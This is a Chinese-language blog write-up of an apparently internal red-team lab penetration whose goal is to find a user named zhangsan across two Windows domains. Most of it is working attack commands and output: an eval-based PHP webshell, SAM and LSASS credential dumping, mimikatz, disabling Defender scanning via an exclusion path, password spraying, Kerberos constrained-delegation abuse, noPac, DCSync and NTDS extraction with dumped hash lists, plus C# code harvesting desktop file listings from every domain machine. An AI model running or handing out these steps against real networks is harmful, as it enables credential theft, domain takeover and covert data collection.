• 记一次内部红队渗透——定位张三

    渗透过程

    物理机网段:192.168.1.1/24

    上传.php文件拦截

    上传.aaa文件拦截,白名单验证,00阶段和解析漏洞均无解。尝试dirsearch看下目录。

    存在1.php

    upload.php

    index.php 可知存在文件包含

    http://www.hongduilanjun.com/index.php?url=./upload/1.jpg

    ipconfig /all 查看得知工作组

    存在192.168.111.1/24 段。代理忽略。

    抓本地密码

    1. reg save hklm\sam sam.hiv
    2. reg save hklm\system system.hiv

    如果解不开明文可以用certutil进行下载

    certutil.exe -urlcache -split -f http://192.168.111.138/1.zip

    导出sam表move到web路径下为zip,下载到本地mimikatz解密。删除webshell上zip文件

    mimikatz.exe "log" "lsadump::sam /system:system.hiv /sam:sam.hiv" "exit"

    得到hash: administrator:a0f42e3f2c62fe3977e87c4ed35c0f7f

    获取lsass进程

    1. copy c:\windows\system32\comsvcs.dll c:\programdata\1.dll
    2. tasklist /svc | findstr "lsass"
    3. rundll32.exe c:\programdata\1.dll, MiniDump lsass_pid c:\programdata\temp.dmp full

    同理move 到web路径为zip格式下载回来,mimikatz解密。

    mimikatz.exe "log" "sekurlsa::minidump temp.dmp" "sekurlsa::logonPasswords full" "exit"

    webshell机器为windows server 2016,且lsass无其他用户密码。

    wmihashscan得到111.108 administrator用户hash

    nbtscan得知存在双域

    wimiexe得到testredteam.local域机器 192.168.111.108当前为本地administrator权限

    systeminfo为windows server2008机器可以尝试抓到明文密码,切可能存在域内用户hash。我们可以与webshell机器建立ipc把lsass进程dump的内存传递给web目录进行下载。这台域机器没有得到任何域用户只得到了administrator的明文密码为yicunyiye123..

    目前得到的信息为:

    1. webshell:192.168.111.138 workgroup administrator:yicunyiye123..
    2. testredteam.local域机器:192.168.111.108 administrator:yicunyiye123..
    3. testredteam.local 域控为:192.168.111.116

    尝试ms17010 zerologon 均无果。psexec提权为system权限先看看testredteam域内信息。

    这里的时候webshell被杀了,虽然是虚拟机下的df也不至于原始一句话不被杀,执行了这么久被杀,离谱。重新上传webshell。

    2. function ass(){
    3.  function req($a){
    4.   $b $_POST[$a];
    5.   return $b;
    6.  }
    7.  $d req('x');
    8.  eval($d);
    9.  
    10. }
    11. ass();
    12. ?>

    tasklist /svc 得知是df。wmi直接加白。

    WMIC /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath="c:/users/administrator/desktop/"

    psexec上传到webshell机器上 与192.168.111.108建立ipc连接。

    得到testredteam.local域内信息:

    这里要查看域控机器,命令如下:net group "domain computers" /do 存在双引号闭合问题,直接写为bat去执行(其他命令类似思路)。

    目前得到testredteam.local域信息为:

    1. domain users:
    2. Administrator
    3. angle
    4. angle1
    5. baby
    6. jack
    7. test
    8. tom
    9. web
    10. wsad.w
    11. zz
    12.  
    13. domain controllers:
    14. 192.168.111.116

    尝试使用yicunyiye123..密码去碰撞domain users

    得到域用户web-yicunyiye123..

    使用sharpDomain去dump域内组织架构(红队蓝军内网培训c#开发工具)

    暂时未发现张三用户在testredteam.local域。因为在某些内网中管理员acl配置不当可能导致全域拥有dcsync权限,或者前辈来过。所以看看是否存在dcsync或者adminsdholer后门是很有必要的。

    c#代码查询dcsync后门 取完全控制权限

    或者存在3条acl交集下的用户(哪3条?就是那个3条)

    c#代码查询adminsdholder后门

    不存在后门或者配置不当。

    看看委派信息。

    可以看到WIN-CO3OLUGK1S9机器存在对DC的cifs服务存在约束性委派。

    首先dump出WIN-CO3OLUGK1S9机器hash,然后move webshell下载

    得到WIN-CO3OLUGK1S9机器hash为:420590bba2dc05ee36d2a3589d1f71d9

    首先使用kekeo请求用户的TGT:

    tgt::ask /user:WIN-CO3OLUGK1S9 /domain:testredteam.local /NTLM:420590bba2dc05ee36d2a3589d1f71d9 /ticket:test.kirbi

    得到TGT_WIN-CO3OLUGK1S9@TESTREDTEAM.LOCAL_krbtgt~testredteam.local@TESTREDTEAM.LOCAL.kirbi

    然后我们可以使用这张TGT通过伪造s4u请求以administrator用户身份请求访问DC CIFS的ST

    tgs::s4/tgt:TGT_WIN-CO3OLUGK1S9@TESTREDTEAM.LOCAL_krbtgt~testredteam.local@TESTREDTEAM.LOCAL.kirbi /user:Administrator@testredteam.local /service:cifs/WIN-AG37AJNA8A6.testredteam.local

    这里会得到S4U2Self获取到的ST1和S4U2Proxy获取到的ST2票据。注入ST2。

    kerberos::ptt TGS_Administrator@testredteam.local@TESTREDTEAM.LOCAL_cifs~WIN-AG37AJNA8A6.testredteam.local@TESTREDTEAM.LOCAL.kirbi

    拿下域控

    或者尝试nopac

    1. noPac.exe -domain testredteam.local  -user web -pass yicunyiye123.. /dc WIN-AG37AJNA8A6.testredteam.local /mAccount test23 /mPassword test!!..123 /service ldap /ptt /impersonate Administrator
    2.  
    3. mimikatz.exe "log" "lsadump::dcsync /domain:testredteam.local /user:administrator" "exit"

    得到testredteam.local的hash:9a055ccb341690394b8d53407f889403

    dump ntds

    1. mkdir c:\test\
    2. powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q"

    得到testredteal.loca hash:

    1. Administrator:500:aad3b435b51404eeaad3b435b51404ee:9a055ccb341690394b8d53407f889403:::
    2. Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
    3. DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
    4. krbtgt:502:aad3b435b51404eeaad3b435b51404ee:e702408f354095864c7fa10755e00a7c:::
    5. admin08:1104:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
    6. test:1105:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
    7. test:1106:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
    8. test:1107:aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42:::
    9. jack:1108:aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42:::
    10. tom:1109:aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42:::
    11. angle:1110:aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42:::
    12. angle1:1111:aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42:::
    13. baby:1112:aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42:::
    14. zz:1113:aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42:::
    15. it:1114:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
    16. wsad.w:1115:aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42:::
    17. web:1116:aad3b435b51404eeaad3b435b51404ee:a0f42e3f2c62fe3977e87c4ed35c0f7f:::

    得知域内默认密码为P@ssw0rd。使用testredteam.local域内用户对redteam.local域进行用户名枚举。

    得到存在3个用户:administrator,it,jack。继续ldap爆破

    拿到了redteam.local域用户。

    sharpDomain.exe -d 192.168.111.16 -u jack -p P@ssw0rd --GetUsers

    用P@ssw0rd域内默认密码再次滚得到backup用户。

    得到redteam.local域administrator的hash:852a844adfce18f66009b4f14e0a98de cmd解密得到为test123..

    同理dump ntds,查看domaininfo.txt得知存在zhangsan用户:

    编写infothief获取域内所有机器桌面文件。

    1. public static void DesktopFiles()
    2.         {
    3.             try
    4.             {
    5.                 string DesktopFiles = "";
    6.                 //获取机器名
    7.                 StreamReader machine_name = new StreamReader(@"machine.txt");
    8.                 while (!machine_name.EndOfStream)
    9.                 {
    10.                     try
    11.                     {
    12.                         string machine = machine_name.ReadLine();
    13.                         if (IsMachineUp(machine))
    14.                         {
    15.                             //获取当前路径
    16.                             string currentpath = Directory.GetCurrentDirectory();
    17.                             DesktopFiles = currentpath + "\\TargetDesktopinfos";
    18.                             Directory.CreateDirectory(DesktopFiles);
    19.  
    20.                             Console.ForegroundColor = ConsoleColor.Yellow;
    21.                             Console.WriteLine("[*]" + machine);
    22.                             Console.ForegroundColor = ConsoleColor.White;
    23.                             //获取users目录
    24.                             string userpath = @"\\" + machine + @"\c$\users";
    25.                             var user_list = Directory.EnumerateDirectories(userpath);
    26.                             if (Directory.Exists(userpath))
    27.                             {
    28.                                 //创建机器名文件夹
    29.                                 string MachineFolder = DesktopFiles + "\\" + machine;
    30.                                 Directory.CreateDirectory(MachineFolder);
    31.                                 foreach (string user in user_list)
    32.                                 {
    33.                                     string DesktopDirectoryPath = user + "\\desktop";
    34.                                     string username = substring(user);
    35.                                     if (Directory.Exists(DesktopDirectoryPath))
    36.                                     {
    37.                                         //创建用户名文件夹
    38.                                         string UserFolder = MachineFolder + "\\" + username;
    39.                                         Directory.CreateDirectory(UserFolder);
    40.                                         //创建desktop.txt文件
    41.                                         string Desktoptxt = UserFolder + "\\desktop.txt";
    42.                                         StreamWriter sw = File.CreateText(Desktoptxt);
    43.                                         sw.Close();
    44.  
    45.                                         string info_user = substring(user);
    46.                                         Console.ForegroundColor = ConsoleColor.Green;
    47.                                         Console.WriteLine("[*]" + info_user);
    48.                                         Console.ForegroundColor = ConsoleColor.White;
    49.  
    50.                                         string[] AllFiles = Directory.GetFileSystemEntries(DesktopDirectoryPath, "*", SearchOption.AllDirectories);
    51.  
    52.                                         foreach (string file in AllFiles)
    53.                                         {
    54.                                             Console.WriteLine(file);
    55.                                             string create_time = Directory.GetCreationTime(file).ToString();
    56.                                             string writeFileTo = "create time:" + create_time + "  " + file + "\r\n";
    57.                                             File.AppendAllText(Desktoptxt, writeFileTo);
    58.                                         }
    59.                                     }
    60.                                     else
    61.                                     {
    62.                                         continue;
    63.                                     }
    64.                                 }
    65.                             }
    66.                         }
    67.                         else
    68.                         {
    69.                             Console.ForegroundColor = ConsoleColor.Red;
    70.                             Console.WriteLine("[-]" + machine + " is down");
    71.                             Console.ForegroundColor = ConsoleColor.White;
    72.                         }
    73.                     }
    74.                     catch (System.Exception ex)
    75.                     {
    76.                         Console.ForegroundColor = ConsoleColor.Red;
    77.                         Console.WriteLine("[-] error");
    78.                         Console.WriteLine("[-] Exception: " + ex.Message);
    79.                         Console.ForegroundColor = ConsoleColor.White;
    80.                         continue;
    81.                     }
    82.                 }
    83.                 machine_name.Close();
    84.                 Console.WriteLine("[+]out put to:" + DesktopFiles);
    85.             }
    86.             catch (System.Exception ex)
    87.             {
    88.                 Console.ForegroundColor = ConsoleColor.Red;
    89.                 Console.WriteLine("[-] error");
    90.                 Console.WriteLine("[-] Exception: " + ex.Message);
    91.                 Console.ForegroundColor = ConsoleColor.White;
    92.                 return;
    93.             }
    94.         }

    先获取computers列表保存为machine.txt

    得到张三存在的机器。

  • 相关阅读:
    android studio启动虚拟器失败
    HiveServer2 报错 OutOfMemoryError 解决思路
    IDEA下载后没有tomcat选项
    jmeter测试场景设计
    SpringCloudAlibaba之gateway网关
    docker使用笔记
    Spring Security进行权限控制
    【优化调度】遗传算法求解公交车调度排班优化问题【含Matlab源码 2212期】
    如何快速区分GPT-3.5 与GPT-4?
    初阶数据结构 遍历二叉树问题 (一)
  • 原文地址:https://blog.csdn.net/hongduilanjun/article/details/125917266